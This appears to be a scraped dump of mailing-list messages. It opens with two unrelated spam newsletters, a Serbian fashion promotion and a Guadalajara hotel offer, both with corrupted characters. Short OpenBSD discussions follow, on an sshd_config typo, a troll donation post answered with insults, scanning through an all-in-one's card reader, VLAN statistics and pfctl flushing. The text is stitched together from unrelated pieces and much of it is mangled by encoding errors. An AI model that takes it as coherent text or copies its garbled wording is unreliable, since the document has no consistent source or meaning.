Imate problema sa prikazom ove poruke? Kliknite ovde [http://www.extraponude.com/email/link.php?M=784973N=42L=41F=T] za online verziju.Very-Fashion.com Web sajt za online prodaju brendiranih artikala [http://www.extraponude.com/email/link.php?M=784973N=42L=42F=T] [http://www.extraponude.com/email/link.php?M=784973N=42L=42F=T] [http://www.extraponude.com/email/link.php?M=784973N=42L=42F=T] [http://www.extraponude.com/email/link.php?M=784973N=42L=42F=T] Novi proizvodi iz VERY FASHION-a b moda iz Pariza Leto je stiglo, pripremite sebe za potpuno uEivanje u najlepE!em godiE!njem dobu !! Very-Fashion pruEa Vam moguDnost da kupujete proizvode koji se prodaju u Francuskoj a samo za Vas dostavljamo ih na VaE!u kuDnu adresu. Da bismo E!to bolje proslavili poD etak novog godiE!njeg doba, nudimo Vam nove proizvode sa popustima i do 70% : RuD ne torbe iz kolekcije Naf Naf Putne torbe iz kolekcija Lulu Castagnette, Com8 I Bisou Bisou KupaDi kostimi iz kolekcije Didier Parakian Letnja Eenska odeDa iz kolekcije Lesli de Monte Carlo Letnja odeDa za lepE!i ali i za jaD i pol : Armani, Calvin Klein, Miss sixty, Diesel, Energie, Gian Franco Ferre, Torrene itd... JoE! jedna pogodnost za sve naE!e registovane kupce: Osvojite vauD er od 5b, i iskoristite ga na sajtu www.very-fashion.com [http://www.extraponude.com/email/link.php?M=784973N=42L=36F=T] ! Posetite NaE! sajt, registrujte se besplatno i lako, pozovite i do 10 prijatelja da se registruju. Za svakog registrovanog prijatelja koji obavi i svoju prvu narudEbinu dobiDete vauD er u vrednosti od 5b, koji moEete iskoristiti za kupovinu na NaE!em sajtu. Broj proizvoda je limitaran i proizvodi su dostupni dok ih ima na lageru. Ne D ekajte viE!e, posetite naE! sajt i krenite u najbolji shoping na www.very-fashion.com [http://www.extraponude.com/email/link.php?M=784973N=42L=36F=T] Tim Very Fashion Preko 20 najboljih svetskih brendova i mnogo viE!e Za odjavu sa newslettera molimo Vas Kliknite ovde [http://www.extraponude.com/email/link.php?M=784973N=42L=43F=T] CDI d.o.o., Bulevar Arsenija DarnojeviDa 95, Beograd Powered by Net Star
De negocios o placer la mejor opcion en Guadalajara, Meson Ejecutivo
En caso de no poder ver correctamente este correo favor de dar click aqum Le interesa recibir nuestros email? De negocio o por placer en Guadalajara, la mejor opcisn. Con nuestras 71 habitaciones, para los diferentes gustos y necesidades de viajeros. Habitaciones para ocupacisn sencilla con una cama matrimonial, hasta habitaciones ejecutivas y Jr. Suites. Incluye Internet inalambrico de alta velocidad en cortesma Estacionamiento en cortesma HABITACISN ESTANDAR HAB. SUPERIOR /EJECUTIVAJR. SUITE (una cama matrimonial)(una King sz o dos dobles)(una King sz o dos dobles) $900.00$1,150.00$1,250.00 Tarifas por habitacisn, por noche, sujetas al 16% IVA y 2% Imp Est. Sobre hospedaje Tarifas aplicables para noches de lunes a jueves, durante los meses de junio, julio y agosto, sujetas a disponibilidad. AV. MIXICO 2747 COL. VALLARTA NORTE GUADALAJARA, JAL. TEL. (33) 38821050 FAX (33) 3616 4591 LADA SIN COSTO 01 800 5577 221 reservacio...@mesonejecutivo.com Este mensaje fue enviado para informacisn de nuestras promociones. No pretendemos saturar su correo ni causarle molestias. Este mensaje de correo electrsnico no se considera SPAM, ya que cumple con lo establecido en el capmtulo VIII BIS de los lineamientos sobre comercio electrsnico publicados por la PROFECO, ademas de contener instrucciones y una forma electrsnica para notificar y solicitar la cancelacisn de su envmo y no continuar recibiindolo. Si no desea recibir en un futuro estos mensajes favor de hacer clic en ( unsuscr...@pqstravel.com ) y sera removido de nuestra lista en 72 horas. Si desea informacisn sobre nuestros servicios, contactennos a m...@pqstravel.com
Re: no Chroot in Match Block of sshd?
On Fri, Jul 02, 2010, Devin Ceartas wrote: /etc/ssh/sshd_config: line 119: Bad configuration option: ChrootDirecotry ^^ /etc/ssh/sshd_config line 119: Directive 'ChrootDirecotry' is not allowed within a Match block I KNOW I've done this in the recent past. When/why did it change?? Maybe it works if you spell it correctly? ChrootDirectory
Re: no Chroot in Match Block of sshd?
Devin Ceartas wrote on Fri, Jul 02, 2010 at 08:48:39PM -0400: /etc/ssh/sshd_config: line 119: Bad configuration option: ChrootDirecotry Typo? s/cot/cto/
Re: no Chroot in Match Block of sshd?
Ugh. Time for sleep. Devin Ceartas Owner, NacreData L.L.C. PO Box 646 Chapel Hill, NC 27514 (919) 442-8899 de...@nacredata.com AIM or Skype IM: nacredata Facebook, Twitter: nacredata On Jul 2, 2010, at 9:11 PM, Ingo Schwarze schwa...@usta.de wrote: Devin Ceartas wrote on Fri, Jul 02, 2010 at 08:48:39PM -0400: /etc/ssh/sshd_config: line 119: Bad configuration option: ChrootDirecotry Typo? s/cot/cto/
Donation issues with OpenBSD…
http://www.trollaxor.com/2010/06/why-i-almost-gave-openbsd-10-didnt.html
Re: Donation issues with OpenBSD???
On Sat, Jul 03, 2010 at 10:21:00AM +0800, Brent Shumacher wrote: http://www.trollaxor.com/2010/06/why-i-almost-gave-openbsd-10-didnt.html You're a douchebag: http://www.trollaxor.com/2001/06/another-apology.html
Re: Donation issues with OpenBSD???
On Sat, Jul 03, 2010 at 10:21:00AM +0800, Brent Shumacher wrote: http://www.trollaxor.com/2010/06/why-i-almost-gave-openbsd-10-didnt.html Obvious troll is obvious
Re: Donation issues with OpenBSD???
You do realize this article is satire, yes? On 2010 Jul 03 (Sat) at 10:21:00 +0800 (+0800), Brent Shumacher wrote: :http://www.trollaxor.com/... : -- The cost of living is going up, and the chance of living is going down.
Scanning without SANE
Dear All, This is not really a question but rather an observation which I made today and which could be very useful for desktop users. It concerns use of scanners (even Windows only printers). As we know the standard way to access scanners on OpenBSD is using sane-backends drivers. They support a fair number of scanners in particular better flat bad USB scanners. Some all-in-one devices produced by Epson are also supported. Sane-backends are supposedly supporting large number of HP made all-in-one devices via proprietary hpaio library which is a part of HPLIP. Unfortunately HPLIP is written with Linux only in mind and it works rather well on OpenBSD only due to heroic effort of our developer Antoine Jacoutot. Luckily it turns out that you do not need any software or drivers to scan with most HP all-in-one device! My wife has a HP Photosmart C5250 all-in-one. C5250 comes with several readers for various types of flash memory cards commonly used by digital cameras. If you press scan button the small menu pups up on the C5250 display with gives you option of scanning directly onto the flash memory card. At the same time a generic kernel of OpenBSD to which my HP all-in-one is connected via USB sees the same flash memory card as a standard SCSI HDD. I just mounted the flash memory as mount -t msdos /dev/sd0i /mnt and I could see a directory on /mnt with scan images. I would guess that the above trick works for any all-in-one or scanner device which has flash memory cards readers including the one produced by Canon and Brother which are not supported by sane-backends. I could even see that you could print on these all-in-one devices without any drivers as long as the kernel sees card readers as SCSI HDD when the all-in-once are connected via USB (or network). You just send your files to flash cards and once there you print directly to printer. Enjoy, Predrag Punosevac P.S. I hope you will find above hardware solution for printing and scanning as interesting as OpenBSD way of VoIP (ssh+aucat).
Re: Question about VLAN interfaces and SNMP Stats
* rh...@hushmail.com rh...@hushmail.com [2010-06-30 13:28]: When pulling stats off a VLAN interface, do the in/out figures reflect the traffic values flowing to/from the attached subnet they represent the packets/bytes going through that specific interface, of course. -- Henning Brauer, h...@bsws.de, henn...@openbsd.org BS Web Services, http://bsws.de Full-Service ISP - Secure Hosting, Mail and DNS Services Dedicated Servers, Rootservers, Application Hosting
Re: pfctl -a anchorname -F all does not clear states AND pfctl -anchorname -F states clears all states even ones not created by rules in anchorname
# pfctl -a atelonly -F all -Fall with -a makes no sense whatsoever. -Fa clears a lot of non-anchor specific shit. we'll make pfctl bail on that combo. -- Henning Brauer, h...@bsws.de, henn...@openbsd.org BS Web Services, http://bsws.de Full-Service ISP - Secure Hosting, Mail and DNS Services Dedicated Servers, Rootservers, Application Hosting
Re: Donation issues with OpenBSD…
2010/7/2 Brent Shumacher brent.shumac...@gmail.com http://www.trollaxor.com/2010/06/why-i-almost-gave-openbsd-10-didnt.html OMG! I surely like someone how tellme at my face that I am an idiot, than an hypocrite with its dorated lies! -- Atentamente Andris Genovez Tobar / Sistemas http://www.crice.org